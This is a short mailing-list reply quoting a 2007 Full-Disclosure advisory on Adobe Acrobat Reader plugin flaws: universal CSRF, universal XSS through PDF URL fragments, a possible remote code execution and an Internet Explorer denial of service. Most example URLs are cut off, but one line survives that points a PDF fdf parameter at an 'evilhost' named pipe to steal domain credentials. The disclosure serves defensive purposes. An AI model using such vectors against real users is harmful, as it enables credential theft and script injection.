good work

On 1/3/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote:
> Adobe Acrobat Reader Plugin - Multiple Vulnerabilities
> Original Advisory:
> Original Discovery and Research:
> Stefano Di Paola
> Contribution:
> Giorgio Fedon (IE Dos, UXSS Analysis)
> Elia Florio (Poc and Code Execution analysis)
> Status: Vendor Informed on 15 October 2006
> Patched: Yes
> Please upgrade your current version of adobe acrobat
> _______________________________________________________
> Brief Intro:
> During our lecture at 23C3 (Subverting Ajax), we presented
> some interesting attack vectors to take advantage of
> the dangerous vulnerability called "Prototype Hijacking"
> in browser frameworks. Any XSS represents a good
> entry point, and single Universal XSS is de facto the best
> entry point.
> Since Adobe did a great job and patched in less than 1
> month the issues herein reported, we decided to
> undisclose our findings during 23C3 to make the audience
> better understand risks and impacts of high-level plugins
> vulnerabilities (e.g. Func. Integration and not memory
> corruption).
> There is also a possible remote code execution (RCE), but
> was not the focus of our talk.
> Affected Versions:
> Adobe Acrobat Reader plugin 7 (fully patched) and Below
> Tested On:
> Firefox and Below, 2.0RC2 under Windows XP SP2
> Firefox and Below, 2.0RC2 under Ubuntu 6.06
> Internet Explorer SP2 under Windows XP SP2
> Summary:
> Adobe Acrobat plugin for Mozilla Firefox (acroreader) is able to
> populate Portable Documents
> (PDF files) forms by supplying an external set of datas through the FDF,
> XML, or XFDF fields.
> Implementation of FDF, XML, XFDF
> (
> functionalities in Acrobat Reader Plugin is vulnerable to different kind
> of attacks.
> Vulnerability extent changes from browser to browser:
> 1. Universal CSRF / session riding;
> (Mozilla Firefox, Internet Explorer, Opera + Acrobat Reader plugin)
> 2. UXSS in #FDF, #XML e #XFDF;
> (Mozilla Firefox + Acrobat Reader plugin)
> 3. Possible Remote Code Execution;
> (Mozilla Firefox + Acrobat Reader plugin)
> 4. Denial of Service;
> (Internet Explorer + Acrobat Reader plugin)
> ______________________________________
> 1. Universal CSRF and session riding
> This is probably Adobe related as all tested browsers (IE,Firefox,Opera)
> where affected.
> The issue is that by creating a special link like this:
> automatically Adobe plugin sends a request to '' without user
> interaction asking
> for defined page in 'fdf' parameter. This could be used as a Universal
> Session Riding (aka UCSRF)
> attack which is a well known vulnerability.
> Note that the same effect is accomplished by using 'xml' and 'xfdf'
> parameters.
> =====
> 2. UXSS in #FDF, #XML e #XFDF
> In addition by using the following request, is possible to execute
> javascript code
> inside Firefox browser:
>'Test Alert')
> The previous could be triggered against a site and because of this is a
> Universal Cross Site
> Scripting.
> UXSS is a particular type of Cross Site Scripting and has the ability to
> be triggered
> by exploiting flaws inside browsers, instead of leveraging the
> vulnerabilities against
> insecure web sites. It's also possible to force clients to download
> files by supplying:
> 'file://C:/winnt/notepad.exe'
> <Alternative_Attack>
>         Alternative Attack using NamedPipes
>         -
>         In order to steal Domain credentials with explorer :
>         http://anyhost/file.pdf#fdf=res://\\evilhost\pipe\apipe
>         and then by applying techniques found in paper we found
>         this kind of url and protocol (res://) could be used too.
>         This means that also Internet Explorer could be abused in conjunction
> of
>         Adobe plugin to make attacks on internal LANs and get victims
>         credentials.
> </Alternative_Attack>
> 3. Possible Remote Code Execution
> There is also a possible Remote code Execution by leveraging a memory
> corruption inside
> Firefox by supplying the following request:
> It's possible to cause a DoubleFree() error and to overwrite part of the
> Structural
> Exception Handler.
> Runtime vulnerability analisys
> The problem seems to be caused by a "Double" executed by
> Acrobat plugin.
> The routine which cause Firefox to crash is located in the following
> call to NP_Shutdown().
> Elia Florio is credited for Runtime analysis and exploitation.
> NB. The POC of this vulnerability won't be released.
> =====
> 4. Denial of Service (Internet Explorer only);
> By supplying the following request via the web browser,
> it's possible to cause a denial of service in Internet Explorer:
> '#')
> The application is waiting for more inputs and allocates more memory.
> --
> ...oOOo...oOOo....
> Stefano Di Paola
> Software & Security Engineer
> Web:
> ..................
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter:
> Hosted and sponsored by Secunia -

pdp (architect) | petko d. petkov

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